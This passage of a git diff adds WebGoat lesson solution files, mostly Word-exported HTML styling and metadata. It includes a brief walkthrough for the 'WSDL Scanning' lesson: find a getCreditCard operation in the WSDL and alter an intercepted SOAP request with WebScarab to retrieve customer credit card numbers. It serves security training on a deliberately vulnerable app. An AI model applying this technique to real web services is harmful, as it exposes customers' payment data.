+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="5122"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform WSDL Scanning<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->Web
+Services communicate through the use of SOAP requests. These requests are
+submitted to a web service in an attempt to execute a function defined in the
+web service definition language (WSDL) file. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This screen
+is the API for a web service. Check the WSDL file for this web service and try
+to get some customer credit numbers.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_23" o:spid="_x0000_i1028" type="#_x0000_t75"
+ style='width:480pt;height:276pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/WSDLScanning_files/image009.jpg" v:shapes="Picture_x0020_23"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 22</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<h2><span style='color:windowtext'>Solution:<o:p></o:p></span></h2>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Open the WSDL
+file in a new window. There is an operation getCreditCard.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_24" o:spid="_x0000_i1027"
+ type="#_x0000_t75" style='width:480pt;height:276pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/WSDLScanning_files/image010.jpg" v:shapes="Picture_x0020_24"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Intercept the
+request with WebScarab and change the parameter to getCreditCard<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_25"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/WSDLScanning_files/image011.jpg" v:shapes="Picture_x0020_25"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> WebScarab raw request<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_26"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WSDLScanning_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/WSDLScanning_files/image012.jpg" v:shapes="Picture_x0020_26"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 22 Completed<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/WSDLScanning_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WSDLScanning_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/filelist.xml b/main/project/WebContent/lesson_solutions/WSDLScanning_files/filelist.xml
new file mode 100644
index 000000000..5f46ccf32
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WSDLScanning_files/filelist.xml
@@ -0,0 +1,14 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../WSDLScanning.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image009.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image010.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image011.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image012.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/image001.png b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image001.png
new file mode 100644
index 000000000..3268c9b0a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/image003.png b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image003.png
new file mode 100644
index 000000000..25ea1988a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/image005.png b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image005.png
new file mode 100644
index 000000000..63f42f9de
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/image007.png b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image007.png
new file mode 100644
index 000000000..9ca7703d6
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/image009.jpg b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image009.jpg
new file mode 100644
index 000000000..fb0e23ea9
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image009.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/image010.jpg b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image010.jpg
new file mode 100644
index 000000000..cb7259343
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image010.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/image011.jpg b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image011.jpg
new file mode 100644
index 000000000..300095af6
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image011.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/image012.jpg b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image012.jpg
new file mode 100644
index 000000000..2d00abf25
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WSDLScanning_files/image012.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WSDLScanning_files/themedata.thmx b/main/project/WebContent/lesson_solutions/WSDLScanning_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WSDLScanning_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie.html b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie.html
new file mode 100644
index 000000000..1a7b454ee
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie.html
@@ -0,0 +1,914 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns:st1="urn:schemas-microsoft-com:office:smarttags"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><o:SmartTagType
+ namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"/>
+<o:SmartTagType namespaceuri="urn:schemas-microsoft-com:office:smarttags"
+ name="City"/>
+<!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>24</o:TotalTime>
+  <o:Created>2007-07-11T10:52:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:30:00Z</o:LastSaved>
+  <o:Pages>3</o:Pages>
+  <o:Words>345</o:Words>
+  <o:Characters>1972</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>16</o:Lines>
+  <o:Paragraphs>4</o:Paragraphs>
+  <o:CharactersWithSpaces>2313</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
